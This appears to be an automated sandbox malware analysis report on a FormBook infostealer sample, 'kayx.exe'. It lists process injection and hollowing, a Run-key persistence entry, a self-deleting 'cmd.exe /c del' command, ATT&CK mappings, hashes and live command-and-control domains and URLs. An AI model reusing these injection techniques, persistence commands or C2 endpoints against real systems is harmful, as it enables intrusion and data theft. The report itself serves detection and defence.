          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E2AE73 mov eax, dword ptr fs:[00000030h]17_2_00E2AE73
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E2AE73 mov eax, dword ptr fs:[00000030h]17_2_00E2AE73
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E2AE73 mov eax, dword ptr fs:[00000030h]17_2_00E2AE73
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E2AE73 mov eax, dword ptr fs:[00000030h]17_2_00E2AE73
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E17E41 mov eax, dword ptr fs:[00000030h]17_2_00E17E41
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E17E41 mov eax, dword ptr fs:[00000030h]17_2_00E17E41
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E17E41 mov eax, dword ptr fs:[00000030h]17_2_00E17E41
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E17E41 mov eax, dword ptr fs:[00000030h]17_2_00E17E41
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E17E41 mov eax, dword ptr fs:[00000030h]17_2_00E17E41
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E17E41 mov eax, dword ptr fs:[00000030h]17_2_00E17E41
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ECAE44 mov eax, dword ptr fs:[00000030h]17_2_00ECAE44
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ECAE44 mov eax, dword ptr fs:[00000030h]17_2_00ECAE44
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E0E620 mov eax, dword ptr fs:[00000030h]17_2_00E0E620
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EBFE3F mov eax, dword ptr fs:[00000030h]17_2_00EBFE3F
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E0C600 mov eax, dword ptr fs:[00000030h]17_2_00E0C600
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E0C600 mov eax, dword ptr fs:[00000030h]17_2_00E0C600
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E0C600 mov eax, dword ptr fs:[00000030h]17_2_00E0C600
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E38E00 mov eax, dword ptr fs:[00000030h]17_2_00E38E00
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EC1608 mov eax, dword ptr fs:[00000030h]17_2_00EC1608
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E3A61C mov eax, dword ptr fs:[00000030h]17_2_00E3A61C
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E3A61C mov eax, dword ptr fs:[00000030h]17_2_00E3A61C
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E437F5 mov eax, dword ptr fs:[00000030h]17_2_00E437F5
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E18794 mov eax, dword ptr fs:[00000030h]17_2_00E18794
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E87794 mov eax, dword ptr fs:[00000030h]17_2_00E87794
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E87794 mov eax, dword ptr fs:[00000030h]17_2_00E87794
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E87794 mov eax, dword ptr fs:[00000030h]17_2_00E87794
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E1FF60 mov eax, dword ptr fs:[00000030h]17_2_00E1FF60
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ED8F6A mov eax, dword ptr fs:[00000030h]17_2_00ED8F6A
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E1EF40 mov eax, dword ptr fs:[00000030h]17_2_00E1EF40
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E04F2E mov eax, dword ptr fs:[00000030h]17_2_00E04F2E
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E04F2E mov eax, dword ptr fs:[00000030h]17_2_00E04F2E
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E3E730 mov eax, dword ptr fs:[00000030h]17_2_00E3E730
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ED070D mov eax, dword ptr fs:[00000030h]17_2_00ED070D
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ED070D mov eax, dword ptr fs:[00000030h]17_2_00ED070D
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E3A70E mov eax, dword ptr fs:[00000030h]17_2_00E3A70E
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E3A70E mov eax, dword ptr fs:[00000030h]17_2_00E3A70E
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E2F716 mov eax, dword ptr fs:[00000030h]17_2_00E2F716
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E9FF10 mov eax, dword ptr fs:[00000030h]17_2_00E9FF10
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E9FF10 mov eax, dword ptr fs:[00000030h]17_2_00E9FF10
          Source: C:\Users\user\Desktop\kayx.exe, Process token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe, Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\mstsc.exe, Process token adjusted: Debug
          Source: C:\Users\user\Desktop\kayx.exe, Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe, Network Connect: 184.168.131.241 80
          Source: C:\Windows\explorer.exe, Network Connect: 198.185.159.141 80
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\kayx.exe, Memory written: C:\Users\user\Desktop\kayx.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\kayx.exe, Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\kayx.exe, Section loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\mstsc.exe, Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\mstsc.exe, Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\kayx.exe, Thread register set: target process: 3388
          Source: C:\Windows\SysWOW64\mstsc.exe, Thread register set: target process: 3388
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\kayx.exe, Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\kayx.exe, Section unmapped: C:\Windows\SysWOW64\mstsc.exe base address: 3F0000
          Source: C:\Users\user\Desktop\kayx.exe, Process created: C:\Users\user\Desktop\kayx.exe C:\Users\user\Desktop\kayx.exe
          Source: C:\Windows\SysWOW64\mstsc.exe, Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\kayx.exe'
          Source: explorer.exe, 00000012.00000002.482884776.0000000001398000.00000004.00000020.sdmp, Binary or memory string: ProgmanamF
          Source: explorer.exe, 00000012.00000002.483795240.0000000001980000.00000002.00000001.sdmp, firefoxe.exe, 00000013.00000002.483674375.0000000001720000.00000002.00000001.sdmp, firefoxe.exe, 00000014.00000002.483346548.0000000001140000.00000002.00000001.sdmp, mstsc.exe, 00000015.00000002.485726681.0000000003440000.00000002.00000001.sdmp, Binary or memory string: Program Manager
          Source: explorer.exe, 00000012.00000002.483795240.0000000001980000.00000002.00000001.sdmp, firefoxe.exe, 00000013.00000002.483674375.0000000001720000.00000002.00000001.sdmp, firefoxe.exe, 00000014.00000002.483346548.0000000001140000.00000002.00000001.sdmp, mstsc.exe, 00000015.00000002.485726681.0000000003440000.00000002.00000001.sdmp, Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000012.00000002.483795240.0000000001980000.00000002.00000001.sdmp, firefoxe.exe, 00000013.00000002.483674375.0000000001720000.00000002.00000001.sdmp, firefoxe.exe, 00000014.00000002.483346548.0000000001140000.00000002.00000001.sdmp, mstsc.exe, 00000015.00000002.485726681.0000000003440000.00000002.00000001.sdmp, Binary or memory string: Progman
          Source: explorer.exe, 00000012.00000002.483795240.0000000001980000.00000002.00000001.sdmp, firefoxe.exe, 00000013.00000002.483674375.0000000001720000.00000002.00000001.sdmp, firefoxe.exe, 00000014.00000002.483346548.0000000001140000.00000002.00000001.sdmp, mstsc.exe, 00000015.00000002.485726681.0000000003440000.00000002.00000001.sdmp, Binary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\kayx.exe, Queries volume information: C:\Users\user\Desktop\kayx.exe VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe, Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe VolumeInformation
          Source: C:\Users\user\Desktop\kayx.exe, Code function: 1_2_05C4C920 GetUserNameA
          Source: C:\Users\user\Desktop\kayx.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook

          Remote Access Functionality:

          Yara detected FormBook

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Shared Modules 1 | Registry Run Keys / Startup Folder 11 | Process Injection 612 | Masquerading 1 | Input Capture 1 | Query Registry 1 | Remote Services | Input Capture 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Registry Run Keys / Startup Folder 11 | Virtualization/Sandbox Evasion 3 | LSASS Memory | Security Software Discovery 321 | Remote Desktop Protocol | Archive Collected Data 11 | Exfiltration Over Bluetooth | Ingress Tool Transfer 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools 1 | Security Account Manager | Virtualization/Sandbox Evasion 3 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 612 | NTDS | Process Discovery 2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 2 | SIM Card Swap |  | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 11 | LSA Secrets | Account Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 4 | Cached Domain Credentials | System Owner/User Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service |  | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing 13 | DCSync | Remote System Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | File and Directory Discovery 2 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols |  | Generate Fraudulent Advertising Revenue
          Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | System Information Discovery 112 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station |  | Data Destruction

          Behavior Graph

          [Behavior graph image not reproduced. Behavior Graph ID: 321226; Sample: kayx.exe; Startdate: 20/11/2020; Architecture: WINDOWS; Score: 100. Process chain shown: kayx.exe -> kayx.exe (three child instances) -> explorer.exe (injected) -> mstsc.exe and firefoxe.exe (two instances); mstsc.exe -> cmd.exe -> conhost.exe.]

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          kayx.exe | 35% | Virustotal |
          kayx.exe | 46% | ReversingLabs | ByteCode-MSIL.Infostealer.Maslog
          kayx.exe | 100% | Avira | TR/Dropper.MSIL.blecg
          kayx.exe | 100% | Joe Sandbox ML |

          Dropped Files

          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe | 100% | Avira | TR/Dropper.MSIL.blecg
          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe | 100% | Joe Sandbox ML |
          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe | 46% | ReversingLabs | ByteCode-MSIL.Infostealer.Maslog

          Unpacked PE Files

          Source | Detection | Scanner | Label
          17.2.kayx.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          17.1.kayx.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs


          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
jibenentreprenad.mobi | 184.168.131.241 | true | true | | unknown
ext-sq.squarespace.com | 198.185.159.141 | true | false | | high
www.jibenentreprenad.mobi | unknown | unknown | true | | unknown
www.ghoster.agency | unknown | unknown | true | | unknown
www.amtpsychology.com | unknown | unknown | true | | unknown

                    Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.jibenentreprenad.mobi/bg8v/?dR-0T=BcRzG6gD98FnRJnM8S7gZqeq6OFb5sR0iVW6Pm7cF5yWostREqJtYuV2Juo62Dzc0Jb1&Fxl0dR=KdShEXiX | true | Avira URL Cloud: safe | unknown
http://www.ghoster.agency/bg8v/?dR-0T=Hsg8WmNsaLMOQIlEIMfuFbk4MqbSZJWeSLNd01xx1olwbrd2uyfvFyB8JS14b3uA3WpV&Fxl0dR=KdShEXiX | true | Avira URL Cloud: safe | unknown

                    URLs from Memory and Binaries


                                        Contacted IPs


                                        Public

IP | Domain | Country | ASN | ASN Name | Malicious
184.168.131.241 | unknown | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | true
198.185.159.141 | unknown | United States | 53831 | SQUARESPACEUS | false

                                        General Information

Joe Sandbox Version: 31.0.0 Red Diamond
Analysis ID: 321226
Start date: 20.11.2020
Start time: 16:30:50
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 37s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: kayx.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 28
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@14/3@4/2
EGA Information: Failed
HDC Information:
• Successful, ratio: 24.8% (good quality ratio 23.3%)
• Quality average: 73.5%
• Quality standard deviation: 29.4%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 130
• Number of non-executed functions: 136
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
                                        • Excluded IPs from analysis (whitelisted): 13.64.90.137, 104.42.151.234, 104.43.139.144, 23.210.248.85, 51.104.144.132, 205.185.216.10, 205.185.216.42, 40.67.251.132, 20.54.26.129, 92.122.213.194, 92.122.213.247
                                        • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wns.notify.windows.com.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, par02p.wns.notify.windows.com.akadns.net, db5p.wns.notify.windows.com.akadns.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, cds.d2s7q6s2.hwcdn.net, ris.api.iris.microsoft.com, umwatsonrouting.trafficmanager.net, skypedataprdcolwus16.cloudapp.net
                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                        Simulations

                                        Behavior and APIs

Time | Type | Description
16:32:44 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run firefoxe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe"
16:32:52 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run firefoxe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe"

                                        Joe Sandbox View / Context

                                        IPs


                                        Domains


                                        ASN


                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\kayx.exe.log
Process: C:\Users\user\Desktop\kayx.exe
File Type: ASCII text, with CRLF line terminators
Category: modified
Size (bytes): 425
Entropy (8bit): 5.340009400190196
Encrypted: false
SSDEEP: 12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhav:ML9E4Ks2wKDE4KhK3VZ9pKhk
MD5: CC144808DBAF00E03294347EADC8E779
SHA1: A3434FC71BA82B7512C813840427C687ADDB5AEA
SHA-256: 3FC7B9771439E777A8F8B8579DD499F3EB90859AD30EFD8A765F341403FC7101
SHA-512: A4F9EB98200BCAF388F89AABAF7EA57661473687265597B13192C24F06638C6339A3BD581DF4E002F26EE1BA09410F6A2BBDB4DA0CD40B59D63A09BAA1AADD3D
Malicious: true
Reputation: moderate, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..
                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe
                                        Process:C:\Users\user\Desktop\kayx.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):432640
                                        Entropy (8bit):7.899249270813086
                                        Encrypted:false
                                        SSDEEP:6144:2k6/GQOb8Jv8lhFf3cbXPFF7pnWtZBkPsMQ3GYYm5O3iMEbSpchQZd/l:2f/GDAJEn9crPFFFnWvLNBbSpZdd
                                        MD5:A80E73A824B655491F54278B7A29467D
                                        SHA1:F33DDFFC223C9AFA4E226D3567B990A8E44828E6
                                        SHA-256:BDCD13ABDDED8F4F709FB288FB78B4AFFF486854B3EA78AD378D11220A31C3C4
                                        SHA-512:382DE45D9EFB0214BAEDDF26645A1858E5FF8A5090CFC1FCBCB552C03D69B1D0B78DE7833D7CEAFAFDE29CCF38B974E2D691EFF9249140BCB013E88EE15B482D
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 46%
                                        Reputation:low
                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe:Zone.Identifier
                                        Process:C:\Users\user\Desktop\kayx.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:true
                                        Reputation:high, very likely benign file
                                        Preview: [ZoneTransfer]....ZoneId=0

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):7.899249270813086
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                        • DOS Executable Generic (2002/1) 0.01%
                                        File name:kayx.exe
                                        File size:432640
                                        MD5:a80e73a824b655491f54278b7a29467d
                                        SHA1:f33ddffc223c9afa4e226d3567b990a8e44828e6
                                        SHA256:bdcd13abdded8f4f709fb288fb78b4afff486854b3ea78ad378d11220a31c3c4
                                        SHA512:382de45d9efb0214baeddf26645a1858e5ff8a5090cfc1fcbcb552c03d69b1d0b78de7833d7ceafafde29ccf38b974e2d691eff9249140bcb013e88ee15b482d
                                        SSDEEP:6144:2k6/GQOb8Jv8lhFf3cbXPFF7pnWtZBkPsMQ3GYYm5O3iMEbSpchQZd/l:2f/GDAJEn9crPFFFnWvLNBbSpZdd

                                        File Icon

                                        Icon Hash:031c185e1a2e4608

                                        Static PE Info

                                        General

                                        Entrypoint:0x4669fc
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                        Time Stamp:0x5FB67AE0 [Thu Nov 19 14:02:08 2020 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:v4.0.30319
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                        Entrypoint Preview

                                        Instruction
                                        jmp dword ptr [00402000h]
                                        add byte ptr [eax], al

                                        Data Directories

                                        Name                                  Virtual Address  Virtual Size  Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT          0x669b2          0x4a          .text
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE        0x68000          0x4956        .rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC       0x6e000          0xc           .reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                        IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                        IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
                                        IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                        Sections

                                        Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy         Characteristics
                                        .text   0x2000           0x64a02       0x64c00   False     0.957082137872   data       7.94131868162   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                        .rsrc   0x68000          0x4956        0x4a00    False     0.173880912162   data       4.22602262855   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc  0x6e000          0xc           0x200     False     0.044921875      data       0.101910425663  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                        Resources

                                        Name           RVA      Size    Type  Language  Country
                                        RT_ICON        0x6806c  0x4228  dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 4294440951, next used block 4294440951
                                        RT_GROUP_ICON  0x6c2d0  0x14    data
                                        RT_VERSION     0x6c320  0x410   data
                                        RT_MANIFEST    0x6c76c  0x1ea   XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                        Imports

                                        DLL          Import
                                        mscoree.dll  _CorExeMain

                                        Version Infos

                                        Description       Data
                                        Translation       0x0000 0x04b0
                                        LegalCopyright    Microsoft Corporation. All rights reserved.
                                        Assembly Version  6.1.7601.23834
                                        InternalName      Vdltohs3.exe
                                        FileVersion       6.1.7601.23834
                                        CompanyName       Microsoft Corporation
                                        Comments          Microsoft Help and Support
                                        ProductName       Microsoft Windows Operating System
                                        ProductVersion    6.1.7601.23834
                                        FileDescription   Microsoft Help and Support
                                        OriginalFilename  Vdltohs3.exe

                                        Network Behavior

                                        Network Port Distribution

                                        TCP Packets


                                        UDP Packets


                                        DNS Queries

                                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                        Nov 20, 2020 16:33:34.681273937 CET | 192.168.2.3 | 8.8.8.8 | 0x1cd1 | Standard query (0) | www.ghoster.agency | A (IP address) | IN (0x0001)
                                        Nov 20, 2020 16:33:40.177280903 CET | 192.168.2.3 | 8.8.8.8 | 0xa019 | Standard query (0) | www.jibenentreprenad.mobi | A (IP address) | IN (0x0001)
                                        Nov 20, 2020 16:33:41.199937105 CET | 192.168.2.3 | 8.8.8.8 | 0xa019 | Standard query (0) | www.jibenentreprenad.mobi | A (IP address) | IN (0x0001)
                                        Nov 20, 2020 16:33:49.797297955 CET | 192.168.2.3 | 8.8.8.8 | 0x9e95 | Standard query (0) | www.amtpsychology.com | A (IP address) | IN (0x0001)

                                        DNS Answers

                                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                        Nov 20, 2020 16:33:34.720000029 CET | 8.8.8.8 | 192.168.2.3 | 0x1cd1 | No error (0) | www.ghoster.agency | ext-sq.squarespace.com | | CNAME (Canonical name) | IN (0x0001)
                                        Nov 20, 2020 16:33:34.720000029 CET | 8.8.8.8 | 192.168.2.3 | 0x1cd1 | No error (0) | ext-sq.squarespace.com | | 198.185.159.141 | A (IP address) | IN (0x0001)
                                        Nov 20, 2020 16:33:34.720000029 CET | 8.8.8.8 | 192.168.2.3 | 0x1cd1 | No error (0) | ext-sq.squarespace.com | | 198.49.23.141 | A (IP address) | IN (0x0001)
                                        Nov 20, 2020 16:33:41.229835987 CET | 8.8.8.8 | 192.168.2.3 | 0xa019 | No error (0) | www.jibenentreprenad.mobi | jibenentreprenad.mobi | | CNAME (Canonical name) | IN (0x0001)
                                        Nov 20, 2020 16:33:41.229835987 CET | 8.8.8.8 | 192.168.2.3 | 0xa019 | No error (0) | jibenentreprenad.mobi | | 184.168.131.241 | A (IP address) | IN (0x0001)
                                        Nov 20, 2020 16:33:41.263674021 CET | 8.8.8.8 | 192.168.2.3 | 0xa019 | No error (0) | www.jibenentreprenad.mobi | jibenentreprenad.mobi | | CNAME (Canonical name) | IN (0x0001)
                                        Nov 20, 2020 16:33:41.263674021 CET | 8.8.8.8 | 192.168.2.3 | 0xa019 | No error (0) | jibenentreprenad.mobi | | 184.168.131.241 | A (IP address) | IN (0x0001)
                                        Nov 20, 2020 16:33:49.852216005 CET | 8.8.8.8 | 192.168.2.3 | 0x9e95 | Name error (3) | www.amtpsychology.com | none | none | A (IP address) | IN (0x0001)

                                        HTTP Request Dependency Graph

                                        • www.ghoster.agency
                                        • www.jibenentreprenad.mobi

                                        HTTP Packets

                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
